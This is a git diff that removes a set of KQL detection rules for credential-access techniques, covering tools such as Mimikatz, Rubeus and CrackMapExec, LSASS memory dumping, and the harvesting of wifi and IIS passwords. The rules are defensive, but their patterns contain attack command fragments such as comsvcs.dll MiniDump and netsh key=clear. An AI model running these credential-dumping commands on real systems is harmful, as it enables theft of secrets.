index 2edc5195..00000000
--- a/Credential Access/Findstr_GPP_Passwords.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_ADCSPwn_Execution.kql b/Credential Access/HackTool_-_ADCSPwn_Execution.kql
deleted file mode 100644
index 36f7298a..00000000
--- a/Credential Access/HackTool_-_ADCSPwn_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/31
-// Level: high
-// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
-// Tags: attack.credential_access, attack.t1557.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certify_Execution.kql b/Credential Access/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Credential Access/HackTool_-_Certify_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certipy_Execution.kql b/Credential Access/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Credential Access/HackTool_-_Certipy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Execution.kql b/Credential Access/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql b/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql
deleted file mode 100644
index 8b3ce06f..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/12
-// Level: high
-// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql b/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql
deleted file mode 100644
index 666d65b4..00000000
--- a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/02/04
-// Level: critical
-// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql b/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql
deleted file mode 100644
index 3733349a..00000000
--- a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
-// Tags: attack.credential_access, attack.t1110.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql b/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql
deleted file mode 100644
index 271ce887..00000000
--- a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vasiliy Burov
-// Date: 2020/10/05
-// Level: high
-// Description: Detects command line parameters used by Hydra password guessing hack tool
-// Tags: attack.credential_access, attack.t1110, attack.t1110.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Inveigh_Execution.kql b/Credential Access/HackTool_-_Inveigh_Execution.kql
deleted file mode 100644
index 55ed6692..00000000
--- a/Credential Access/HackTool_-_Inveigh_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/24
-// Level: critical
-// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql b/Credential Access/HackTool_-_KrbRelayUp_Execution.kql
deleted file mode 100644
index d07c94db..00000000
--- a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelay_Execution.kql b/Credential Access/HackTool_-_KrbRelay_Execution.kql
deleted file mode 100644
index 41c083fa..00000000
--- a/Credential Access/HackTool_-_KrbRelay_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the use of KrbRelay, a Kerberos relaying tool
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Mimikatz_Execution.kql b/Credential Access/HackTool_-_Mimikatz_Execution.kql
deleted file mode 100644
index dc21b4df..00000000
--- a/Credential Access/HackTool_-_Mimikatz_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
-// Date: 2019/10/22
-// Level: high
-// Description: Detection well-known mimikatz command line arguments
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql b/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql
deleted file mode 100644
index 981465c3..00000000
--- a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql b/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql
deleted file mode 100644
index aee2a9e3..00000000
--- a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: high
-// Description: Detects usage of the Quarks PwDump tool via commandline arguments
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Rubeus_Execution.kql b/Credential Access/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Credential Access/HackTool_-_Rubeus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SafetyKatz_Execution.kql b/Credential Access/HackTool_-_SafetyKatz_Execution.kql
deleted file mode 100644
index 2931012e..00000000
--- a/Credential Access/HackTool_-_SafetyKatz_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/20
-// Level: critical
-// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SecurityXploded_Execution.kql b/Credential Access/HackTool_-_SecurityXploded_Execution.kql
deleted file mode 100644
index 6a2b1712..00000000
--- a/Credential Access/HackTool_-_SecurityXploded_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of SecurityXploded Tools
-// Tags: attack.credential_access, attack.t1555
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_WinPwn_Execution.kql b/Credential Access/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Credential Access/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql b/Credential Access/Hacktool_Execution_-_PE_Metadata.kql
deleted file mode 100644
index 9f37a725..00000000
--- a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
-// Tags: attack.credential_access, attack.t1588.002, attack.t1003
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index ed32575d..00000000
--- a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql b/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql
deleted file mode 100644
index 3e04ec9d..00000000
--- a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
-
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql b/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql
deleted file mode 100644
index 64fa624b..00000000
--- a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql b/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql
deleted file mode 100644
index 1315b6f9..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/10/19
-// Level: high
-// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Files.kql b/Credential Access/LSASS_Process_Memory_Dump_Files.kql
deleted file mode 100644
index ef02e00f..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/15
-// Level: high
-// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdump" or FolderPath contains "\\lsassdmp") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or (FolderPath endswith ".dmp" and FolderPath startswith "nanodump")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 5a56bd67..00000000
--- a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql b/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql
deleted file mode 100644
index 2fa5f37f..00000000
--- a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql b/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql
deleted file mode 100644
index 8e3a1035..00000000
--- a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/28
-// Level: high
-// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql b/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql
deleted file mode 100644
index 633a86ce..00000000
--- a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
-// Date: 2022/11/08
-// Level: high
-// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/Credential Access/Mimikatz_Kirbi_File_Creation.kql b/Credential Access/Mimikatz_Kirbi_File_Creation.kql
deleted file mode 100644
index 29c1c896..00000000
--- a/Credential Access/Mimikatz_Kirbi_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE
-// Date: 2021/11/08
-// Level: critical
-// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
-// Tags: attack.credential_access, attack.t1558
-DeviceFileEvents
-| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/Credential Access/NPPSpy_Hacktool_Usage.kql b/Credential Access/NPPSpy_Hacktool_Usage.kql
deleted file mode 100644
index 5b0bddd5..00000000
--- a/Credential Access/NPPSpy_Hacktool_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
